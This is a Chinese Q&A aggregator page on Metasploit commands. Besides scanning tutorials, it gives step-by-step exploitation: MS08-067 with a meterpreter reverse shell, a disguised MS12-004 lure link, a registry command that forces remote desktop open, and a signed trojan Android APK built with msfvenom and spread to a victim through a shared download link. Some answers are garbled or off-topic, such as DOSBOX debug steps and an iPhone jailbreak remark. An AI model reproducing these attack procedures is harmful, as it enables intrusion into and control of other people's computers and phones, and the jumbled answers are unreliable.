導航:首頁 > 程序命令 > metasploit命令

metasploit命令

發布時間:2022-08-19 21:55:58

❶ 如何用Metasploit掃描埠

一、調用Nmap進行掃描
進入msf命令行後直接輸入nmap –v –sVip(具體命令和nmap一樣)
二、MSF模塊掃描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有關埠掃描的工具:searchportscan
我們使用Use auxiliary/scanner/postscan/syn
看一下參數配置 showoptions

我們先來設置一下網卡
Set INTERFACE eth0
設置一下掃描的埠,我們這里來掃描80:set PORTS 80
設置掃描目標RHOSTS :set RHOSTS 119.63.37.149
在設置一下線程:set THREADS 100
看一下我們設置好的

這時候我們都設置好了,我們來攻擊下,看看效果,用命令run進行攻擊
缺點就是掃描的速度有點慢啊

MetaSploit SMB掃描獲取系統信息
還是搜索一下smb:searchsmb

這次發現搜出來很多,我們用這個模塊
Use auxiliary/scanner/smb/smb_version
看一下需要設置的參數

設定目標ip:set RHOSTS 192.168.188.140
在設置一下線程:set THREAD 10
然後run一下,查看結果

直接掃描出來小夥伴的系統還有主機名,速度不到1s,很快
也可以批量掃描設置批量掃描目標即可 set RHOSTS 192.168.188.50-200

MetaSploit服務識別
我們這里對SSH和FTP進行識別
在這里使用這個模塊:use auxiliary/scanner/ssh/ssh_version
然後我們設置一下參數,這里講設置好的參數截圖看一下

Run一下看看結果,其實沒有掃出來,好像是屏蔽了,但是用nmap卻掃出來了ssh

在試一下ftp,用這個模塊:use auxiliary/scanner/ftp/ftp_version
設置下參數

可以看到結果,也沒有掃描出來;
MetaSploit SNMP掃描與枚舉
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的參數設置

這個參數還是很多的
設定一下目標
然後在run一下
枚舉用這個模塊
use auxiliary/scanner/snmp/snmp_enum

設置好目標和線程後run一下就可以

MetaSploit遠程代碼執行
搜索一下08-067,使用這個攻擊載荷
use exploit/windows/smb/ms08_067_netapi
同樣來看一下參數設置

我們只要設置一下目標就可以,然後我們需要一個載荷來反彈shell
set payload windows/meterpreter/reverse_tcp
然後設置參數

將LHOST 設置為自己的ip(對外攻擊不要忘了段口轉發)
比如說知道對面的系統是什麼版本,可以指定targer,用target查看一下都有什麼版本

設置一下目標,假設我們目標機器的系統為10:set target 10
這時候,我們再來看一下其參數設置,發現比以前完備了好多

08-067是不會自動識別系統版本的,但是其他的可以自動識別,所以用其他攻擊載荷的時候可以不用設置
然後輸入exploit進行攻擊即可
這時候會出來一個meterpreter>
我們在裡面輸入shell,就會反彈一個shell
這樣整個攻擊過程就完成了

MetaSploit MIDI文件解析遠程代碼執行
還是來搜索12-004

設置下本機ip set SRVHOST ip
然後攻擊

會生成一個連接,但是這個鏈接容易讓人發現,所以我們可以偽裝下ip利用URIPATH參數就可以偽裝
在設置時,會發現報紅,因為4444埠被佔用了,所以我們改下監聽埠 set LPORT 5555
然後生成連接

只要目標點了這個鏈接,那麼我們就會上線一個shell
說一下,目標點擊後我們這邊並沒有反映,我們需要輸下session查看當前會話,會找到上線的機子,連接上線的機子
Session –I 1(id)
然後輸入shell就可以拿到shell

❷ win10怎麼打開metasploit

(1)在互聯網上下載DOSBOX、DEBUG32.EXE或debug.exe程序,把DOSBOX程序安裝 在計算機中。 DEBUG32.EXE或debug.exe程序。
(2)在已知路徑的文件夾中存儲DEBUG32.EXE或debug.exe程序。
(3)雙擊桌面上的運行安裝好的DOSBOX程序。
(4)依次輸入以下命令:
1> Mount c f:\1 *********** 這個指令的意思是將1這個文件夾掛載為DOSBOX的C盤(這樣1文件夾就是DOSBOX的C盤)
2> C: *********** 切換到C盤 3> Debug32
總結:上面的界面窗口已經打開了debug,其後操作和操作debug相同,退出時輸入命令:quit 並點擊enter鍵,就退出debug調試,重新進入DOSBOX程序中。

❸ 如何安裝metasploit

一、搭建metasploit環境
Windows環境下安裝

metasploit

安裝時需要注意要關閉殺毒軟體,如果安裝有殺毒軟體,會提示在metasploit的安裝目錄下檢測到病毒或木馬。
二、metasploit的使用
Metasploit目前提供了三種用戶使用介面,一個是GUI模式,另一個是console模式,第三種是CLI(命令行)模式。原來還提供一種WEB模式,目前已經不再支持。目前這三種模式各有優缺點,建議在MSF console模式中使用。在console中幾乎可以使用MSF所提供的所有功能,還可以在console中執行一些其它的外部命令,如ping。
Windows下GUI啟動方式,從開始菜單——Metasploit Framework——Metaspliit GUI即可。如下圖所示:

其GUI模式啟動後界面如圖2所示:

Windows下console模式的啟動方式與GUI方式類似,啟動後界面如圖3所示:

Metasploit的使用較為簡單,了解其基本命令即可。下面以console的使用方式為例說明如何使用:
輸入help或?可查看幫助信息。

下面以exploit中的ms04_045_wins為例進行說明。
1、show exploits,
2、info exploit/windows/wins/ms04_045_wins,查看其描述信息。

3、use exploit/windows/wins/ms04_045_wins,使用此exploit。

4、show options,查看相應的選項

5、set RHOST 192.168.1.200,設置目標
6、set RPORT 7777,設置埠
7、set PAYLOAD generic/shell_bind_tcp,設置使用的shellcode
8、exploit,執行攻擊

❹ 高手救命~~~ 使用metasploit侵入目標機器(我只是在自己裝的虛擬機做實驗~~~)

如下圖:


這個情況是無法進入對方遠程的 要開啟箭頭所指的才可以進行遠程式控制制



輸入命令以下命令查看埠情況

netstat -an 查看埠 看有沒有3389這個 如果沒有用命令開啟對方的3389埠:REG ADD " "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


這條命令:REG ADD " "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 是強制允許進行任何遠程操作


再用遠程式控制制輸入你所設置的賬號密碼就可以了



希望對你有所幫助

❺ metasploit 資料庫連接問題

您好,metasploit中也默認使用postgres資料庫,要連接資料庫。首先查看資料庫服務是否開啟,shell命令:
netstat
-tnpl
|
grep
postgres
記下埠,一會連接資料庫時需要。在去查看postgres資料庫用戶名和密碼
在/opt/metasploit/config/database.yml這個配置文件中
進入metasploit命令行界面:使用命令db_connect
可連接資料庫,具體命令:db_connect
username:[email protected]:埠號/資料庫名
輸入db_status即可看到連接的資料庫

❻ 如何使用metasploit對安卓手機進行控制

在這次的實驗中,我會使用kali linux和安卓模擬器演示如何使用Metasploit框架控制android設備。
創建負載
我們需要兩台虛擬機:Kali Linux和安卓模擬器。

打開vm啟動Kali linux。接著打開終端,使用msfvenom製作android利用程序。

Msfvenom是msfpayload和msfencode的組合。它是一個單一的工具。它有標準的命令行選項。 Msfvenom用來製造的有效載荷用來滲透Android模擬器。
一旦打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 設置要使用的payload
LHOST 設置用來接收反彈連接的主機
LPORT 設置用來接收反彈連接的埠
R 設置文件格式
Location 要保存的文件位置
這個命令執行完之後,你會看到一些錯誤,但不用擔心。現在可以到輸出目錄查看生成的apk了。

我們已經成功創建了Android格式(APK)文件的有效載荷。現在一般Android的移動設備不允許安裝沒有適當簽名證書的應用程序。 Android設備只安裝帶有簽署文件的APK。
我們可以使用如下工具進行手動簽名:
l Keytool (已安裝)
l jar signer (已安裝)
l zipalign (需要安裝)
執行下列命令簽名。首先使用密鑰工具創建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

然後使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
`

Kali沒有預裝Zipalign,需要先apt-get install zipalign。然後用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

現在我們有了一個帶有簽名的APK,它可以安裝在任何設備上。

使用Metasploit進行測試
接下來啟動metasploit的監聽器。執行msfconsole打開控制台。

use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

是時候將惡意的APK發送到手機上。我們這里使用一個網盤上傳我們的APK,並將下載鏈接分享出去。

1、從https://code.google.com/archive/p/android-x86/downloads下載android x86的iso。
2、使用vmware創建一個內核版本為2.6的虛擬機。
3、掛載鏡像,啟動虛擬機。
4、進入Live模式。
5、設置手機並登陸谷歌帳號。
在安卓模擬器裡面點擊那個鏈接並下載。我們已經發送了一封郵件到受害者的谷歌帳號上。

另外要允許安卓安裝來歷不明的apk。

切換回Kali,我們發現創建了一個新的會話。

然後你就可以為所欲為的操作這台「手機」了。

❼ 怎樣更新metasploit中的模塊

1、打開msf,輸入命令use auxiliary/gather/shodan_search。

注意事項:

Metasploit的設計初衷是打造成一個攻擊工具開發平台,本書稍後將講解如何開發攻擊工具。然而在目前情況下,安全專家以及業余安全愛好者更多地將其當作一種點幾下滑鼠就可以利用其中附帶的攻擊工具進行成功攻擊的環境。

❽ metasploit中,使用什麼命令來載入模塊

1、show 命令沒有停按照時間排序的功能。
2、如果你想找具體的exploit可以受用search命令,search支持幾種關鍵字的查詢,但是也沒有支持時間的。
3、Metploit的exploit模塊除了用msfupdate升級之外,自己也可以寫,或者向其他人要,或者使用付費的方式,或者最新的shellcode,所以其他人有也是正常的,看情況了。如果就你沒有那就是你升級失敗了。
出現exploit failed和fetching required files類似提示錯誤,是電腦安裝新USB硬體驅動造成的,首先先換一個USB口試試,其次檢查安裝新的USB驅動的硬體,有部分驅動會和iPhone的USB驅動有沖突。當然開機F8帶網路的安全模式紅雪也是可以順利越獄的,因為安全模式是不載入驅動的。

❾ metasploit中的命令set THREADS 10是什麼意思

把攻擊線程數設置成10個

閱讀全文

與metasploit命令相關的資料

熱點內容
安卓手機網不穩定怎麼辦 瀏覽:804
tgz解壓手機版 瀏覽:260
nginx圖片gzip壓縮 瀏覽:49
如何讓安卓手機內存一秒變大 瀏覽:213
excel編程循環 瀏覽:301
程序員想深造 瀏覽:689
pdf轉換word後表格 瀏覽:383
程序員算相親優質對象嗎 瀏覽:232
王者榮耀安卓一鍵換裝怎麼設置 瀏覽:58
賓士g75指令編程 瀏覽:221
proteus單片機程序 瀏覽:263
雲遷移文檔伺服器 瀏覽:681
電視端app怎麼寫 瀏覽:256
備注文件夾怎麼弄 瀏覽:701
phprestapi實例 瀏覽:33
php讀取csv中文亂碼 瀏覽:509
java函數返回數組 瀏覽:441
思維版圖pdf 瀏覽:489
葯物文件夾的監查 瀏覽:510
android線控耳機開發 瀏覽:658